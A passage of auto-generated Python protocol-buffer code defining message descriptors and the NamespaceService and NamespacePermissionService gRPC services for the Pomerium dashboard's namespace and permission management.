_descriptor.FieldDescriptor(
name='group_email', full_name='pomerium.dashboard.NamespacePermissionGroup.group_email', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.NamespacePermissionGroup.namespace_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_name', full_name='pomerium.dashboard.NamespacePermissionGroup.namespace_name', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='role', full_name='pomerium.dashboard.NamespacePermissionGroup.role', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=979,
serialized_end=1124,
)
_NAMESPACEPERMISSIONUSER = _descriptor.Descriptor(
name='NamespacePermissionUser',
full_name='pomerium.dashboard.NamespacePermissionUser',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='user_id', full_name='pomerium.dashboard.NamespacePermissionUser.user_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_name', full_name='pomerium.dashboard.NamespacePermissionUser.user_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_email', full_name='pomerium.dashboard.NamespacePermissionUser.user_email', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='group_ids', full_name='pomerium.dashboard.NamespacePermissionUser.group_ids', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.NamespacePermissionUser.namespace_id', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_name', full_name='pomerium.dashboard.NamespacePermissionUser.namespace_name', index=5,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='role', full_name='pomerium.dashboard.NamespacePermissionUser.role', index=6,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1127,
serialized_end=1287,
)
_DELETENAMESPACEPERMISSIONREQUEST = _descriptor.Descriptor(
name='DeleteNamespacePermissionRequest',
full_name='pomerium.dashboard.DeleteNamespacePermissionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.DeleteNamespacePermissionRequest.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1289,
serialized_end=1335,
)
_DELETENAMESPACEPERMISSIONRESPONSE = _descriptor.Descriptor(
name='DeleteNamespacePermissionResponse',
full_name='pomerium.dashboard.DeleteNamespacePermissionResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1337,
serialized_end=1372,
)
_GETNAMESPACEPERMISSIONREQUEST = _descriptor.Descriptor(
name='GetNamespacePermissionRequest',
full_name='pomerium.dashboard.GetNamespacePermissionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.GetNamespacePermissionRequest.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1374,
serialized_end=1417,
)
_GETNAMESPACEPERMISSIONRESPONSE = _descriptor.Descriptor(
name='GetNamespacePermissionResponse',
full_name='pomerium.dashboard.GetNamespacePermissionResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_permission', full_name='pomerium.dashboard.GetNamespacePermissionResponse.namespace_permission', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1419,
serialized_end=1522,
)
_LISTNAMESPACEPERMISSIONSREQUEST = _descriptor.Descriptor(
name='ListNamespacePermissionsRequest',
full_name='pomerium.dashboard.ListNamespacePermissionsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1524,
serialized_end=1557,
)
_LISTNAMESPACEPERMISSIONSRESPONSE = _descriptor.Descriptor(
name='ListNamespacePermissionsResponse',
full_name='pomerium.dashboard.ListNamespacePermissionsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_permissions', full_name='pomerium.dashboard.ListNamespacePermissionsResponse.namespace_permissions', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1559,
serialized_end=1665,
)
_LISTNAMESPACEPERMISSIONGROUPSREQUEST = _descriptor.Descriptor(
name='ListNamespacePermissionGroupsRequest',
full_name='pomerium.dashboard.ListNamespacePermissionGroupsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.ListNamespacePermissionGroupsRequest.namespace_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1667,
serialized_end=1727,
)
_LISTNAMESPACEPERMISSIONGROUPSRESPONSE = _descriptor.Descriptor(
name='ListNamespacePermissionGroupsResponse',
full_name='pomerium.dashboard.ListNamespacePermissionGroupsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='groups', full_name='pomerium.dashboard.ListNamespacePermissionGroupsResponse.groups', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1729,
serialized_end=1830,
)
_LISTNAMESPACEPERMISSIONUSERSREQUEST = _descriptor.Descriptor(
name='ListNamespacePermissionUsersRequest',
full_name='pomerium.dashboard.ListNamespacePermissionUsersRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.ListNamespacePermissionUsersRequest.namespace_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1832,
serialized_end=1891,
)
_LISTNAMESPACEPERMISSIONUSERSRESPONSE = _descriptor.Descriptor(
name='ListNamespacePermissionUsersResponse',
full_name='pomerium.dashboard.ListNamespacePermissionUsersResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='users', full_name='pomerium.dashboard.ListNamespacePermissionUsersResponse.users', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1893,
serialized_end=1991,
)
_SETNAMESPACEPERMISSIONREQUEST = _descriptor.Descriptor(
name='SetNamespacePermissionRequest',
full_name='pomerium.dashboard.SetNamespacePermissionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_permission', full_name='pomerium.dashboard.SetNamespacePermissionRequest.namespace_permission', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1993,
serialized_end=2095,
)
_SETNAMESPACEPERMISSIONRESPONSE = _descriptor.Descriptor(
name='SetNamespacePermissionResponse',
full_name='pomerium.dashboard.SetNamespacePermissionResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_permission', full_name='pomerium.dashboard.SetNamespacePermissionResponse.namespace_permission', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2097,
serialized_end=2200,
)
_NAMESPACE.fields_by_name['created_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_NAMESPACE.fields_by_name['modified_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_NAMESPACE.fields_by_name['deleted_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETNAMESPACERESPONSE.fields_by_name['namespace'].message_type = _NAMESPACE
_LISTNAMESPACESRESPONSE.fields_by_name['namespaces'].message_type = _NAMESPACE
_SETNAMESPACEREQUEST.fields_by_name['namespace'].message_type = _NAMESPACE
_SETNAMESPACERESPONSE.fields_by_name['namespace'].message_type = _NAMESPACE
_NAMESPACEPERMISSION.fields_by_name['created_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_NAMESPACEPERMISSION.fields_by_name['modified_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETNAMESPACEPERMISSIONRESPONSE.fields_by_name['namespace_permission'].message_type = _NAMESPACEPERMISSION
_LISTNAMESPACEPERMISSIONSRESPONSE.fields_by_name['namespace_permissions'].message_type = _NAMESPACEPERMISSION
_LISTNAMESPACEPERMISSIONGROUPSRESPONSE.fields_by_name['groups'].message_type = _NAMESPACEPERMISSIONGROUP
_LISTNAMESPACEPERMISSIONUSERSRESPONSE.fields_by_name['users'].message_type = _NAMESPACEPERMISSIONUSER
_SETNAMESPACEPERMISSIONREQUEST.fields_by_name['namespace_permission'].message_type = _NAMESPACEPERMISSION
_SETNAMESPACEPERMISSIONRESPONSE.fields_by_name['namespace_permission'].message_type = _NAMESPACEPERMISSION
DESCRIPTOR.message_types_by_name['Namespace'] = _NAMESPACE
DESCRIPTOR.message_types_by_name['DeleteNamespaceRequest'] = _DELETENAMESPACEREQUEST
DESCRIPTOR.message_types_by_name['DeleteNamespaceResponse'] = _DELETENAMESPACERESPONSE
DESCRIPTOR.message_types_by_name['GetNamespaceRequest'] = _GETNAMESPACEREQUEST
DESCRIPTOR.message_types_by_name['GetNamespaceResponse'] = _GETNAMESPACERESPONSE
DESCRIPTOR.message_types_by_name['ListNamespacesRequest'] = _LISTNAMESPACESREQUEST
DESCRIPTOR.message_types_by_name['ListNamespacesResponse'] = _LISTNAMESPACESRESPONSE
DESCRIPTOR.message_types_by_name['SetNamespaceRequest'] = _SETNAMESPACEREQUEST
DESCRIPTOR.message_types_by_name['SetNamespaceResponse'] = _SETNAMESPACERESPONSE
DESCRIPTOR.message_types_by_name['NamespacePermission'] = _NAMESPACEPERMISSION
DESCRIPTOR.message_types_by_name['NamespacePermissionGroup'] = _NAMESPACEPERMISSIONGROUP
DESCRIPTOR.message_types_by_name['NamespacePermissionUser'] = _NAMESPACEPERMISSIONUSER
DESCRIPTOR.message_types_by_name['DeleteNamespacePermissionRequest'] = _DELETENAMESPACEPERMISSIONREQUEST
DESCRIPTOR.message_types_by_name['DeleteNamespacePermissionResponse'] = _DELETENAMESPACEPERMISSIONRESPONSE
DESCRIPTOR.message_types_by_name['GetNamespacePermissionRequest'] = _GETNAMESPACEPERMISSIONREQUEST
DESCRIPTOR.message_types_by_name['GetNamespacePermissionResponse'] = _GETNAMESPACEPERMISSIONRESPONSE
DESCRIPTOR.message_types_by_name['ListNamespacePermissionsRequest'] = _LISTNAMESPACEPERMISSIONSREQUEST
DESCRIPTOR.message_types_by_name['ListNamespacePermissionsResponse'] = _LISTNAMESPACEPERMISSIONSRESPONSE
DESCRIPTOR.message_types_by_name['ListNamespacePermissionGroupsRequest'] = _LISTNAMESPACEPERMISSIONGROUPSREQUEST
DESCRIPTOR.message_types_by_name['ListNamespacePermissionGroupsResponse'] = _LISTNAMESPACEPERMISSIONGROUPSRESPONSE
DESCRIPTOR.message_types_by_name['ListNamespacePermissionUsersRequest'] = _LISTNAMESPACEPERMISSIONUSERSREQUEST
DESCRIPTOR.message_types_by_name['ListNamespacePermissionUsersResponse'] = _LISTNAMESPACEPERMISSIONUSERSRESPONSE
DESCRIPTOR.message_types_by_name['SetNamespacePermissionRequest'] = _SETNAMESPACEPERMISSIONREQUEST
DESCRIPTOR.message_types_by_name['SetNamespacePermissionResponse'] = _SETNAMESPACEPERMISSIONRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Namespace = _reflection.GeneratedProtocolMessageType('Namespace', (_message.Message,), {
'DESCRIPTOR' : _NAMESPACE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.Namespace)
})
_sym_db.RegisterMessage(Namespace)
DeleteNamespaceRequest = _reflection.GeneratedProtocolMessageType('DeleteNamespaceRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETENAMESPACEREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.DeleteNamespaceRequest)
})
_sym_db.RegisterMessage(DeleteNamespaceRequest)
DeleteNamespaceResponse = _reflection.GeneratedProtocolMessageType('DeleteNamespaceResponse', (_message.Message,), {
'DESCRIPTOR' : _DELETENAMESPACERESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.DeleteNamespaceResponse)
})
_sym_db.RegisterMessage(DeleteNamespaceResponse)
GetNamespaceRequest = _reflection.GeneratedProtocolMessageType('GetNamespaceRequest', (_message.Message,), {
'DESCRIPTOR' : _GETNAMESPACEREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.GetNamespaceRequest)
})
_sym_db.RegisterMessage(GetNamespaceRequest)
GetNamespaceResponse = _reflection.GeneratedProtocolMessageType('GetNamespaceResponse', (_message.Message,), {
'DESCRIPTOR' : _GETNAMESPACERESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.GetNamespaceResponse)
})
_sym_db.RegisterMessage(GetNamespaceResponse)
ListNamespacesRequest = _reflection.GeneratedProtocolMessageType('ListNamespacesRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACESREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacesRequest)
})
_sym_db.RegisterMessage(ListNamespacesRequest)
ListNamespacesResponse = _reflection.GeneratedProtocolMessageType('ListNamespacesResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACESRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacesResponse)
})
_sym_db.RegisterMessage(ListNamespacesResponse)
SetNamespaceRequest = _reflection.GeneratedProtocolMessageType('SetNamespaceRequest', (_message.Message,), {
'DESCRIPTOR' : _SETNAMESPACEREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.SetNamespaceRequest)
})
_sym_db.RegisterMessage(SetNamespaceRequest)
SetNamespaceResponse = _reflection.GeneratedProtocolMessageType('SetNamespaceResponse', (_message.Message,), {
'DESCRIPTOR' : _SETNAMESPACERESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.SetNamespaceResponse)
})
_sym_db.RegisterMessage(SetNamespaceResponse)
NamespacePermission = _reflection.GeneratedProtocolMessageType('NamespacePermission', (_message.Message,), {
'DESCRIPTOR' : _NAMESPACEPERMISSION,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.NamespacePermission)
})
_sym_db.RegisterMessage(NamespacePermission)
NamespacePermissionGroup = _reflection.GeneratedProtocolMessageType('NamespacePermissionGroup', (_message.Message,), {
'DESCRIPTOR' : _NAMESPACEPERMISSIONGROUP,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.NamespacePermissionGroup)
})
_sym_db.RegisterMessage(NamespacePermissionGroup)
NamespacePermissionUser = _reflection.GeneratedProtocolMessageType('NamespacePermissionUser', (_message.Message,), {
'DESCRIPTOR' : _NAMESPACEPERMISSIONUSER,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.NamespacePermissionUser)
})
_sym_db.RegisterMessage(NamespacePermissionUser)
DeleteNamespacePermissionRequest = _reflection.GeneratedProtocolMessageType('DeleteNamespacePermissionRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETENAMESPACEPERMISSIONREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.DeleteNamespacePermissionRequest)
})
_sym_db.RegisterMessage(DeleteNamespacePermissionRequest)
DeleteNamespacePermissionResponse = _reflection.GeneratedProtocolMessageType('DeleteNamespacePermissionResponse', (_message.Message,), {
'DESCRIPTOR' : _DELETENAMESPACEPERMISSIONRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.DeleteNamespacePermissionResponse)
})
_sym_db.RegisterMessage(DeleteNamespacePermissionResponse)
GetNamespacePermissionRequest = _reflection.GeneratedProtocolMessageType('GetNamespacePermissionRequest', (_message.Message,), {
'DESCRIPTOR' : _GETNAMESPACEPERMISSIONREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.GetNamespacePermissionRequest)
})
_sym_db.RegisterMessage(GetNamespacePermissionRequest)
GetNamespacePermissionResponse = _reflection.GeneratedProtocolMessageType('GetNamespacePermissionResponse', (_message.Message,), {
'DESCRIPTOR' : _GETNAMESPACEPERMISSIONRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.GetNamespacePermissionResponse)
})
_sym_db.RegisterMessage(GetNamespacePermissionResponse)
ListNamespacePermissionsRequest = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionsRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONSREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionsRequest)
})
_sym_db.RegisterMessage(ListNamespacePermissionsRequest)
ListNamespacePermissionsResponse = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionsResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONSRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionsResponse)
})
_sym_db.RegisterMessage(ListNamespacePermissionsResponse)
ListNamespacePermissionGroupsRequest = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionGroupsRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONGROUPSREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionGroupsRequest)
})
_sym_db.RegisterMessage(ListNamespacePermissionGroupsRequest)
ListNamespacePermissionGroupsResponse = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionGroupsResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONGROUPSRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionGroupsResponse)
})
_sym_db.RegisterMessage(ListNamespacePermissionGroupsResponse)
ListNamespacePermissionUsersRequest = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionUsersRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONUSERSREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionUsersRequest)
})
_sym_db.RegisterMessage(ListNamespacePermissionUsersRequest)
ListNamespacePermissionUsersResponse = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionUsersResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONUSERSRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionUsersResponse)
})
_sym_db.RegisterMessage(ListNamespacePermissionUsersResponse)
SetNamespacePermissionRequest = _reflection.GeneratedProtocolMessageType('SetNamespacePermissionRequest', (_message.Message,), {
'DESCRIPTOR' : _SETNAMESPACEPERMISSIONREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.SetNamespacePermissionRequest)
})
_sym_db.RegisterMessage(SetNamespacePermissionRequest)
SetNamespacePermissionResponse = _reflection.GeneratedProtocolMessageType('SetNamespacePermissionResponse', (_message.Message,), {
'DESCRIPTOR' : _SETNAMESPACEPERMISSIONRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.SetNamespacePermissionResponse)
})
_sym_db.RegisterMessage(SetNamespacePermissionResponse)
DESCRIPTOR._options = None
_NAMESPACESERVICE = _descriptor.ServiceDescriptor(
name='NamespaceService',
full_name='pomerium.dashboard.NamespaceService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=2203,
serialized_end=2632,
methods=[
_descriptor.MethodDescriptor(
name='DeleteNamespace',
full_name='pomerium.dashboard.NamespaceService.DeleteNamespace',
index=0,
containing_service=None,
input_type=_DELETENAMESPACEREQUEST,
output_type=_DELETENAMESPACERESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetNamespace',
full_name='pomerium.dashboard.NamespaceService.GetNamespace',
index=1,
containing_service=None,
input_type=_GETNAMESPACEREQUEST,
output_type=_GETNAMESPACERESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ListNamespaces',
full_name='pomerium.dashboard.NamespaceService.ListNamespaces',
index=2,
containing_service=None,
input_type=_LISTNAMESPACESREQUEST,
output_type=_LISTNAMESPACESRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='SetNamespace',
full_name='pomerium.dashboard.NamespaceService.SetNamespace',
index=3,
containing_service=None,
input_type=_SETNAMESPACEREQUEST,
output_type=_SETNAMESPACERESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_NAMESPACESERVICE)
DESCRIPTOR.services_by_name['NamespaceService'] = _NAMESPACESERVICE
_NAMESPACEPERMISSIONSERVICE = _descriptor.ServiceDescriptor(
name='NamespacePermissionService',
full_name='pomerium.dashboard.NamespacePermissionService',
file=DESCRIPTOR,
index=1,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=2635,
serialized_end=3495,
methods=[
_descriptor.MethodDescriptor(
name='DeleteNamespacePermission',
full_name='pomerium.dashboard.NamespacePermissionService.DeleteNamespacePermission',
index=0,
containing_service=None,
input_type=_DELETENAMESPACEPERMISSIONREQUEST,
output_type=_DELETENAMESPACEPERMISSIONRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetNamespacePermission',
full_name='pomerium.dashboard.NamespacePermissionService.GetNamespacePermission',
index=1,
containing_service=None,
input_type=_GETNAMESPACEPERMISSIONREQUEST,
output_type=_GETNAMESPACEPERMISSIONRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ListNamespacePermissions',
full_name='pomerium.dashboard.NamespacePermissionService.ListNamespacePermissions',
index=2,
containing_service=None,
input_type=_LISTNAMESPACEPERMISSIONSREQUEST,
output_type=_LISTNAMESPACEPERMISSIONSRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ListNamespacePermissionGroups',
full_name='pomerium.dashboard.NamespacePermissionService.ListNamespacePermissionGroups',
index=3,
containing_service=None,
input_type=_LISTNAMESPACEPERMISSIONGROUPSREQUEST,
output_type=_LISTNAMESPACEPERMISSIONGROUPSRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ListNamespacePermissionUsers',
full_name='pomerium.dashboard.NamespacePermissionService.ListNamespacePermissionUsers',
index=4,
